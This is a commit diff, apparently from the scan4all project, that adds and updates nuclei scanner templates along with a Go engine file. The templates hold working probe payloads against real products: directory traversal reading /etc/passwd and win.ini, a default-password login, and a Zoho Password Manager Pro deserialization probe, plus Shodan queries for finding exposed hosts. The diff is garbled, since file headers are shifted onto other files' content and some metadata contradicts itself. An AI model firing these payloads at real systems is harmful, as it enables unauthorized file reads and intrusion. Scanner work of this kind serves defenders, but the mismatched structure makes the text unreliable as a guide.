up PoCs 2022-09-06

Author: hktalent

config/nuclei-templates/README.md

@@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
 
 |    TAG    | COUNT |    AUTHOR     | COUNT |    DIRECTORY     | COUNT | SEVERITY | COUNT |  TYPE   | COUNT |
 |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve       |  1388 | daffainfo     |   630 | cves             |  1363 | info     |  1450 | http    |  3773 |
-| panel     |   642 | dhiyaneshdk   |   558 | exposed-panels   |   649 | high     |   974 | file    |    76 |
-| edb       |   548 | pikpikcu      |   326 | vulnerabilities  |   510 | medium   |   811 | network |    51 |
-| lfi       |   496 | pdteam        |   269 | technologies     |   278 | critical |   469 | dns     |    17 |
-| xss       |   472 | geeknik       |   187 | exposures        |   273 | low      |   219 |         |       |
-| wordpress |   415 | dwisiswant0   |   169 | token-spray      |   230 | unknown  |     7 |         |       |
-| exposure  |   394 | 0x_akoko      |   158 | misconfiguration |   217 |          |       |         |       |
-| cve2021   |   343 | princechaddha |   150 | workflows        |   189 |          |       |         |       |
-| rce       |   335 | pussycat0x    |   133 | default-logins   |   102 |          |       |         |       |
-| wp-plugin |   312 | ritikchaddha  |   130 | file             |    76 |          |       |         |       |
-
-**294 directories, 4145 files**.
+| cve       |  1414 | daffainfo     |   630 | cves             |  1389 | info     |  1463 | http    |  3823 |
+| panel     |   649 | dhiyaneshdk   |   577 | exposed-panels   |   656 | high     |  1000 | file    |    76 |
+| edb       |   557 | pikpikcu      |   326 | vulnerabilities  |   510 | medium   |   811 | network |    51 |
+| lfi       |   500 | pdteam        |   269 | technologies     |   280 | critical |   475 | dns     |    17 |
+| xss       |   486 | geeknik       |   187 | exposures        |   273 | low      |   221 |         |       |
+| wordpress |   417 | dwisiswant0   |   169 | misconfiguration |   231 | unknown  |    10 |         |       |
+| exposure  |   404 | 0x_akoko      |   162 | token-spray      |   230 |          |       |         |       |
+| cve2021   |   350 | princechaddha |   150 | workflows        |   189 |          |       |         |       |
+| rce       |   335 | ritikchaddha  |   135 | default-logins   |   102 |          |       |         |       |
+| wp-plugin |   314 | pussycat0x    |   133 | file             |    76 |          |       |         |       |
+
+**295 directories, 4195 files**.
 
 </td>
 </tr>

config/nuclei-templates/TEMPLATES-STATS.json

@@ -1,12 +1,12 @@
 |    TAG    | COUNT |    AUTHOR     | COUNT |    DIRECTORY     | COUNT | SEVERITY | COUNT |  TYPE   | COUNT |
 |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve       |  1388 | daffainfo     |   630 | cves             |  1363 | info     |  1450 | http    |  3773 |
-| panel     |   642 | dhiyaneshdk   |   558 | exposed-panels   |   649 | high     |   974 | file    |    76 |
-| edb       |   548 | pikpikcu      |   326 | vulnerabilities  |   510 | medium   |   811 | network |    51 |
-| lfi       |   496 | pdteam        |   269 | technologies     |   278 | critical |   469 | dns     |    17 |
-| xss       |   472 | geeknik       |   187 | exposures        |   273 | low      |   219 |         |       |
-| wordpress |   415 | dwisiswant0   |   169 | token-spray      |   230 | unknown  |     7 |         |       |
-| exposure  |   394 | 0x_akoko      |   158 | misconfiguration |   217 |          |       |         |       |
-| cve2021   |   343 | princechaddha |   150 | workflows        |   189 |          |       |         |       |
-| rce       |   335 | pussycat0x    |   133 | default-logins   |   102 |          |       |         |       |
-| wp-plugin |   312 | ritikchaddha  |   130 | file             |    76 |          |       |         |       |
+| cve       |  1414 | daffainfo     |   630 | cves             |  1389 | info     |  1463 | http    |  3823 |
+| panel     |   649 | dhiyaneshdk   |   577 | exposed-panels   |   656 | high     |  1000 | file    |    76 |
+| edb       |   557 | pikpikcu      |   326 | vulnerabilities  |   510 | medium   |   811 | network |    51 |
+| lfi       |   500 | pdteam        |   269 | technologies     |   280 | critical |   475 | dns     |    17 |
+| xss       |   486 | geeknik       |   187 | exposures        |   273 | low      |   221 |         |       |
+| wordpress |   417 | dwisiswant0   |   169 | misconfiguration |   231 | unknown  |    10 |         |       |
+| exposure  |   404 | 0x_akoko      |   162 | token-spray      |   230 |          |       |         |       |
+| cve2021   |   350 | princechaddha |   150 | workflows        |   189 |          |       |         |       |
+| rce       |   335 | ritikchaddha  |   135 | default-logins   |   102 |          |       |         |       |
+| wp-plugin |   314 | pussycat0x    |   133 | file             |    76 |          |       |         |       |

config/nuclei-templates/TEMPLATES-STATS.md

@@ -0,0 +1,34 @@
+id: CVE-2014-8676
+
+info:
+  name: Simple Online Planning Tool 1.3.2 - Directory Traversal
+  author: 0x_Akoko
+  severity: medium
+  description: |
+    Directory traversal vulnerability in the file_get_contents function in SOPlanning 1.32 and earlier allows remote attackers to determine the existence of arbitrary files via a .. (dot dot) in a URL path parameter.
+  reference:
+    - https://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-8676
+    - https://www.exploit-db.com/exploits/37604/
+    - http://seclists.org/fulldisclosure/2015/Jul/44
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2014-8676
+    cwe-id: CWE-22
+  tags: cve,cve2014,soplanning,lfi,packetstorm
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/TOP-10.md

@@ -0,0 +1,32 @@
+id: CVE-2015-7245
+
+info:
+  name: D-Link DVG-N5402SP - Path Traversal
+  author: 0x_Akoko
+  severity: high
+  description: |
+    Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter.
+  reference:
+    - https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html
+    - https://www.exploit-db.com/exploits/39409/
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-7245
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2015-7245
+    cwe-id: CWE-22
+  tags: cve,cve2015,dlink,lfi,packetstorm,edb
+
+requests:
+  - raw:
+      - |
+        POST /cgibin/webproc HTTP/1.1
+        Host: {{Hostname}}
+
+        getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh
+
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"

config/nuclei-templates/cves/2014/CVE-2014-8676.yaml

@@ -14,7 +14,7 @@ info:
     cvss-score: 7.5
     cve-id: CVE-2016-6601
     cwe-id: CWE-22
-  tags: cve,cve2016,zoho,lfi,webnms
+  tags: edb,cve,cve2016,zoho,lfi,webnms
 
 requests:
   - method: GET

config/nuclei-templates/cves/2015/CVE-2015-7245.yaml

@@ -0,0 +1,32 @@
+id: CVE-2021-35380
+
+info:
+  name: TermTalk Server 3.24.0.2 - Unauthenticated Arbitrary File Read
+  author: fxploit
+  severity: high
+  description: |
+    A Directory Traversal vulnerability exists in Solari di Udine TermTalk Server (TTServer) 3.24.0.2, which lets an unauthenticated malicious user gain access to the files on the remote system by gaining access to the relative path of the file they want to download.
+  reference:
+    - https://www.swascan.com/solari-di-udine/
+    - https://www.exploit-db.com/exploits/50638
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-35380
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-35380
+    cwe-id: CWE-22
+  tags: cve,cve2022,termtalk,lfi,unauth,lfr,edb
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/file?valore=../../../../../windows/win.ini"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "bit app support"
+          - "fonts"
+          - "extensions"
+        condition: and

config/nuclei-templates/cves/2016/CVE-2016-6601.yaml

@@ -12,7 +12,10 @@ info:
     - https://nvd.nist.gov/vuln/detail/CVE-2022-31269
     - https://eg.linkedin.com/in/omar-1-hashem
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
+    cvss-score: 8.2
     cve-id: CVE-2022-31269
+    cwe-id: CWE-798
   metadata:
     shodan-query: http.title:"Linear eMerge"
     verified: "true"

config/nuclei-templates/cves/2021/CVE-2021-35380.yaml

@@ -3,15 +3,18 @@ id: CVE-2022-31798
 info:
   name: Nortek Linear eMerge E3-Series - XSS
   author: ritikchaddha
-  severity: high
+  severity: medium
   description: |
     There is local session fixation that chained with reflected cross-site scripting leads to account take over of admin or less privileged users.
   reference:
     - https://packetstormsecurity.com/files/167992/
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31798
     - http://packetstormsecurity.com/files/167992/Nortek-Linear-eMerge-E3-Series-Account-Takeover.html
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
     cve-id: CVE-2022-31798
+    cwe-id: CWE-79
   metadata:
     shodan-query: http.title:"eMerge"
     verified: "true"

config/nuclei-templates/cves/2022/CVE-2022-31269.yaml

@@ -0,0 +1,58 @@
+id: CVE-2022-35405
+
+info:
+  name: Zoho ManageEngine Password Manager Pro - Unauthenticated Remote Command Execution
+  author: true13
+  severity: critical
+  description: |
+    This is a de-serialization vulnerability that causes unauthenticated RCE in XML-RPC of Zoho Manage Engine Password Manager Pro.
+  reference:
+    - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/zoho_password_manager_pro_xml_rpc_rce.rb
+    - https://xz.aliyun.com/t/11578
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-35405
+    - https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-35405
+  metadata:
+    shodan-query: http.title:"ManageEngine Password"
+  tags: cve,cve2022,rce,zoho,passwordmanager,deserialization,unauth,msf
+
+requests:
+  - raw:
+      - |
+        POST /xmlrpc HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml
+
+        <?xml version="1.0"?>
+        <methodCall>
+          <methodName>ProjectDiscovery</methodName>
+          <params>
+            <param>
+              <value>
+                <struct>
+                  <member>
+                    <name>test</name>
+                    <value>
+                      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions"></serializable>
+                    </value>
+                  </member>
+                </struct>
+              </value>
+            </param>
+          </params>
+        </methodCall>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Failed to read result object: null"
+
+      - type: word
+        part: header
+        words:
+          - text/xml

config/nuclei-templates/cves/2022/CVE-2022-31798.yaml

@@ -0,0 +1,36 @@
+id: 3com-nj2000-default-login
+
+info:
+  name: 3COM NJ2000 Default Login
+  author: daffainfo
+  severity: high
+  description: 3COM NJ2000 default admin credentials were discovered.
+  reference:
+    - https://www.manualslib.com/manual/204158/3com-Intellijack-Nj2000.html?page=12
+  metadata:
+    verified: true
+    shodan-query: http.title:"ManageEngine Password"
+    fofa-query: body="NJ2000"
+  tags: default-login,3com,nj2000
+
+requests:
+  - raw:
+      - |
+        POST /login.html HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        password=password
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>3Com Corporation Web Interface</title>'
+          - '<frame name="mainFrame" src="blank.html">'
+        condition: and
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2022/CVE-2022-35405.yaml

@@ -0,0 +1,30 @@
+id: cvent-panel-detect
+
+info:
+  name: Cvent Panel Detect
+  author: tess
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"Cvent Inc"
+  tags: panel,cvent
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+      - '{{BaseURL}}/Login.aspx'
+      - '{{BaseURL}}/manager/login.aspx'
+      - '{{BaseURL}}/GDSHost/Default.aspx'
+      - '{{BaseURL}}/events/EventRsvp.aspx'
+
+    stop-at-first-match: true
+    redirects: true
+    max-redirects: 2
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Cvent Inc"
+          - "Cvent, Inc."
+        condition: or

config/nuclei-templates/default-logins/3com/3com-nj2000-default-login.yaml

@@ -0,0 +1,25 @@
+id: omniampx-panel
+
+info:
+  name: Omnia Node MPX - Panel
+  author: arafatansari
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"Omnia MPX"
+  tags: panel,omnia,omniampx
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/login'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Omnia MPX Node | Login"
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/exposed-panels/cvent-panel-detect.yaml

@@ -0,0 +1,47 @@
+package engine
+
+import (
+	"github.com/hktalent/scan4all/lib/util"
+	"github.com/hktalent/scan4all/pocs_go"
+	"log"
+)
+
+// 引擎总入口
+func init() {
+	util.RegInitFunc(func() {
+		// 异步启动一个线程处理检测，避免
+		go func() {
+			//nMax := 120 // 等xxx秒都没有消息进入就退出
+			//nCnt := 0
+			for {
+				select {
+				case <-util.Ctx_global.Done():
+					close(util.PocCheck_pipe)
+					return
+				case x1, ok := <-util.PocCheck_pipe:
+					if util.GetValAsBool("NoPOC") || nil == x1 || !ok {
+						//close(util.PocCheck_pipe) // 这行会在 NoPOC该标志开启时，其他进程无法传递过来而出错
+						log.Println("go_poc_checkout is over")
+						continue
+					}
+					//nCnt = 0
+					log.Printf("<-lib.PocCheck_pipe: %+v  %s", *x1.Wappalyzertechnologies, x1.URL)
+					util.DoSyncFunc(func() {
+						func(x99 *util.PocCheck) {
+							pocs_go.POCcheck(*x99.Wappalyzertechnologies, x99.URL, x99.FinalURL, x99.Checklog4j)
+						}(x1)
+					})
+				default:
+					//var f01 float32 = float32(nCnt) / float32(nMax) * float32(100)
+					//fmt.Printf(" Asynchronous go PoCs detection task %%%0.2f ....\r", f01)
+					//<-time.After(time.Duration(1) * time.Second)
+					//nCnt += 1
+					//if nMax <= nCnt {
+					//	close(util.PocCheck_pipe)
+					//	return
+					//}
+				}
+			}
+		}()
+	})
+}